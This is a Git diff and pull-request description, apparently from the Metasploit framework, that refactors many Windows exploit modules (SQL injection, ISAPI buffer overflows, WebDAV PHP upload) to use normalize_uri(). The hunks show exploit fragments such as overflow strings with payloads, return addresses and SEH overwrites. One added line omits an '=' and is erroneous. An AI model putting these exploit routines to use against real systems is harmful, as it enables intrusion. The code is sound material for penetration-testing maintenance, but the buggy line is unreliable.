--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		res = send_request_raw({'uri'=>target_uri.host})
+		res = send_request_raw({'uri'=>normalize_uri(target_uri.host)})
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
 			return Exploit::CheckCode::Vulnerable
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("#{peer} - Sending SQL injection...")
 		res = send_request_cgi({
-			'uri'       => target_uri.path,
+			'uri'       => normalize_uri(target_uri.path),
 			'method'    => 'POST',
 			'vars_post' => {
 				'commonJson' => 'protList',
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		target_path = "#{File.dirname(target_uri.path)}/#{php_fname}"
 		print_status("#{peer} - Requesting: #{target_path}")
-		send_request_raw({'uri' => target_path})
+		send_request_raw({'uri' => normalize_uri(target_path)})
 
 		handler
 	end

--- a/modules/exploits/windows/http/sybase_easerver.rb
+++ b/modules/exploits/windows/http/sybase_easerver.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Sending the request
 		res = send_request_cgi({
-			'uri'          => datastore['DIR'] + 'Login.jsp?' + crash,
+			'uri'          => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash,
 			'method'       => 'GET',
 			'headers'      => {
 				'Accept'	=> '*/*',

--- a/modules/exploits/windows/http/sysax_create_folder.rb
+++ b/modules/exploits/windows/http/sysax_create_folder.rb
@@ -126,11 +126,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		pass = datastore['SysaxPASS']
 
 		creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"
-
+		uri = normalize_uri(target_uri.to_s)
 		# Login to get SID value
 		r = send_request_cgi({
 			'method' => "POST",
-			'uri'	 => "#{target_uri.to_s}scgi?sid=0&pid=dologin",
+			'uri'	 => "#{uri}/scgi?sid=0&pid=dologin",
 			'data'	 => creds
 		})
 
@@ -146,9 +146,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Find the path because it's used to help calculate the offset
 		random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
-
+		uri normalize_uri(target_uri.to_s)
 		r = send_request_cgi({
-			'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
+			'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
 			'method' => 'POST',
 		})
 
@@ -182,9 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		post_data = Rex::MIME::Message.new
 		post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"")
 		post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"
-
+		uri = normalize_uri(target_uri.to_s)
 		r = send_request_cgi({
-			'uri'	  => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
+			'uri'	  => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
 			'method'  => 'POST',
 			'data'	  => post_data.to_s,
 			'ctype'	  => "multipart/form-data; boundary=#{post_data.bound}",

--- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb
+++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb
@@ -72,11 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def build_path
-		if datastore['PATH'][0,1] == '/'
-			uri_path = datastore['PATH'].dup
-		else
-			uri_path = '/' + datastore['PATH'].dup
-		end
+		uri_path = normalize_uri(datastore['PATH'])
 		uri_path << '/' unless uri_path.ends_with?('/')
 		if datastore['FILENAME']
 			uri_path << datastore['FILENAME']

--- a/modules/exploits/windows/iis/ms02_065_msadc.rb
+++ b/modules/exploits/windows/iis/ms02_065_msadc.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-				'uri'          =>  datastore['PATH'],
+				'uri'          =>  normalize_uri(datastore['PATH']),
 				'method'       => 'GET',
 			})
 		if (res and res.code == 200)
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data  = 'Content-Type: ' + sploit
 
 		res = send_request_raw({
-			'uri'          => datastore['PATH'] + '/AdvancedDataFactory.Query',
+			'uri'          => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query',
 			'headers' =>
 				{
 					'Content-Length' => data.length,

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-				'uri'          =>  datastore['PATH'],
+				'uri'          =>  normalize_uri(datastore['PATH']),
 				'method'       => 'GET',
 			})
 		if (res.code == 200)
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << sploit
 
 		res = send_request_raw({
-			'uri'          => datastore['PATH'] + '/' + method,
+			'uri'          => normalize_uri(datastore['PATH']) + '/' + method,
 			'agent' => 'ACTIVEDATA',
 			'headers' =>
 				{
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			data << "\r\n\r\n--#{boundary}--\r\n"
 
 			res = send_request_raw({
-			'uri'     => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName',
+			'uri'     => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName',
 			'agent'   => 'ACTIVEDATA',
 			'headers' =>
 				{

--- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb
+++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		print_status("Requesting the vulnerable ISAPI path...")
 		res = send_request_raw({
-			'uri' => datastore['URL']
+			'uri' => normalize_uri(datastore['URL'])
 		}, 5)
 
 		if (res and res.code == 400)
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending overflow...")
 
 		res = send_request_raw({
-			'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
+			'uri' => normalize_uri(datastore['URL']) + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
 		}, 5)
 
 		handler

--- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb
+++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-			'uri' => datastore['URL']
+			'uri' => normalize_uri(datastore['URL'])
 		}, -1)
 
 		if (res and res.body =~ /NetShow ISAPI/)
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Send it to the server
 		print_status("Sending request...")
 		res = send_request_cgi({
-			'uri'          => datastore['URL'],
+			'uri'          => normalize_uri(datastore['URL']),
 			'method'       => 'POST',
 			'user-agent'   => 'NSPlayer/2.0',
 			'content-type' => 'application/x-www-form-urlencoded',

--- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb
+++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				print_status("Refreshing the remote dllhost.exe process...")
 
 				res = send_request_raw({
-					'uri' => datastore['URL']
+					'uri' => normalize_uri(datastore['URL'])
 				}, -1)
 
 				if (res and res.body =~ /specified module could not be found/)
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")
 
 			res = send_request_raw({
-				'uri'     => datastore['URL'],
+				'uri'     => normalize_uri(datastore['URL']),
 				'method'  => 'POST',
 				'headers' =>
 				{
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		print_status("Requesting the vulnerable ISAPI path...")
 		r = send_request_raw({
-			'uri' => datastore['URL']
+			'uri' => normalize_uri(datastore['URL'])
 		}, -1)
 
 		if (r and r.code == 501)

--- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb
+++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		r = send_request_raw({
-			'uri'   => datastore['URL'],
+			'uri'   => normalize_uri(datastore['URL']),
 			'query' => 'GetPic?image=msf'
 		}, -1)
 
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		pat[target['Rets'][0]-4, seh.length] = seh
 
 		r = send_request_raw({
-			'uri'   => datastore['URL'],
+			'uri'   => normalize_uri(datastore['URL']),
 			'query' => 'Redirect?url=' + pat
 		}, 5)
 

--- a/modules/exploits/windows/isapi/w3who_query.rb
+++ b/modules/exploits/windows/isapi/w3who_query.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_raw(
 			{
-				'uri'   => datastore['URL']
+				'uri'   => normalize_uri(datastore['URL'])
 			}, -1)
 		http_fingerprint({ :response => res })  # XXX: Needs custom body match
 
@@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Sending request...")
 		r = send_request_raw({
-			'uri'   => datastore['URL'],
+			'uri'   => normalize_uri(datastore['URL']),
 			'query' => buf
 		}, 5)
 

--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -72,8 +72,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		tmp_rport = datastore['RPORT']
+		uri = normalize_uri(target_uri.host)
 		datastore['RPORT'] = datastore['HTTPPORT']
-		res = send_request_raw({'uri'=>target_uri.host})
+		res = send_request_raw({'uri'=>uri})
 		datastore['RPORT'] = tmp_rport
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/
@@ -126,7 +127,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		datastore['RPORT'] = datastore['HTTPPORT']
 
 		# Request our payload
-		path = File.dirname("#{target_uri.path}/.")
+		uri = normalize_uri(target_uri.path)
+		path = File.dirname("#{uri}/.")
 		res = send_request_raw({'uri'=>"#{path}#{php_fname}"})
 		return (res and res.code == 200)
 	end


### PR DESCRIPTION
This is a follow on from PULL 1045 (HDM)

I've implemented the normalize_uri() function on a number
of modules that I think HD overlooked... there are probably
more that I missed on my search as well.

Please only consider this after applying PULL 1045 as
it contains the required normalize_uri() function used
